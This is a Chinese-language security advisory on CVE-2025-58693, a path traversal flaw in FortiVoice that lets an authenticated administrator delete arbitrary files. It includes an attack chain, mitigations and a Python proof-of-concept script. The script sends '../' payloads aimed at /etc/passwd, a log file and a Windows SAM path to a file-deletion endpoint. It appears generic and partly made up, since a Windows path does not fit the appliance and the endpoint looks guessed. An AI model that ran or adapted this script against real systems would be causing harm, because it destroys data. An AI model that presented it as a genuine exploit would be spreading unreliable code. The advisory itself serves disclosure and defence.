CVE-2025-58693 FortiVoice路径遍历漏洞允许删除任意文件

漏洞信息

漏洞编号

CVE-2025-58693

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

FortiVoice

漏洞概述

CVE-2025-58693是Fortinet FortiVoice企业通信解决方案中的一个路径遍历漏洞。该漏洞存在于FortiVoice 7.2.0至7.2.2版本以及7.0.0至7.0.7版本中，源于对路径名的限制不当。攻击者利用该漏洞可以通过精心构造的HTTP或HTTPS请求，删除目标系统底层文件系统上的任意文件。由于该漏洞需要高权限才能利用，因此主要威胁来自内部特权用户或已被提升权限的攻击者。成功利用此漏洞可能导致系统文件被删除，造成服务中断、数据丢失或进一步的安全风险。漏洞已于2026年1月13日被披露，建议用户尽快升级到修复版本以消除安全风险。

技术细节

该路径遍历漏洞的根本原因在于FortiVoice的Web管理界面未能正确验证和限制用户提供的文件路径参数。攻击者可以通过在HTTP请求中注入特殊构造的路径序列（如../）来绕过安全限制，访问和操作受保护目录之外的文件系统资源。具体来说，漏洞存在于处理文件删除请求的功能模块中，该模块在执行文件删除操作前未对路径进行充分的规范化处理和权限验证。攻击者需要具备高权限账户（如管理员权限），然后构造恶意请求指定目标文件路径，利用路径遍历字符序列指向系统关键文件。成功利用后，可导致任意文件删除，可能造成配置文件丢失、系统功能异常或服务不可用。此漏洞的CVSS评分6.5反映了其在网络可达性方面的风险，但需要高权限认证的限制条件降低了实际利用难度。

攻击链分析

STEP 1

步骤1

攻击者获取FortiVoice系统的高权限账户（如管理员账号）

STEP 2

步骤2

攻击者构造包含路径遍历序列（如../../../）的恶意HTTP/HTTPS请求

STEP 3

步骤3

发送精心构造的请求到FortiVoice的文件删除API接口

STEP 4

步骤4

服务器端未正确验证路径参数，攻击者成功绕过目录限制

STEP 5

步骤5

目标文件被删除，可能导致系统配置文件丢失、服务中断或数据损毁

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib3
urllib3.disable_warnings()

# CVE-2025-58693 PoC - FortiVoice Path Traversal File Deletion
# Target: FortiVoice < 7.2.3 or < 7.0.8

target_url = "https://target-fortivoice.local:443"

# Authentication headers (requires high privilege account)
auth_headers = {
    "Authorization": "Bearer YOUR_ADMIN_TOKEN",
    "Content-Type": "application/json"
}

# Path traversal payload to delete arbitrary file
# The vulnerability allows deleting files outside the intended directory
path_traversal_payloads = [
    "../../../etc/passwd",
    "../../../var/log/fortivoice.log",
    "..\..\..\windows\system32\config\sam"
]

def exploit(target, payload):
    """Send malicious request to delete arbitrary file"""
    endpoint = f"{target}/api/v2/ucm/voicemail/delete"
    
    params = {
        "file_path": payload,
        "force": "true"
    }
    
    try:
        response = requests.post(
            endpoint,
            headers=auth_headers,
            params=params,
            verify=False,
            timeout=30
        )
        
        print(f"[*] Payload: {payload}")
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text}\n")
        
        return response.status_code == 200
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

if __name__ == "__main__":
    print("[*] CVE-2025-58693 PoC - FortiVoice Path Traversal")
    print("[*] Requires high privilege authentication\n")
    
    for payload in path_traversal_payloads:
        exploit(target_url, payload)

影响范围

FortiVoice 7.0.0 - 7.0.7

FortiVoice 7.2.0 - 7.2.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制FortiVoice管理界面的网络访问，仅允许授权的管理员IP地址访问；2）审查并最小化管理员账户数量，确保仅授予必要的权限；3）启用并监控安全日志，及时发现异常的文件操作行为；4）实施网络隔离，将FortiVoice系统部署在独立的网络区域；5）考虑部署Web应用防火墙（WAF）来检测和阻止路径遍历攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-58693
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-58693
3 Details https://www.cvedetails.com/cve/CVE-2025-58693/
4 VulDB https://vuldb.com/cve/CVE-2025-58693
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-778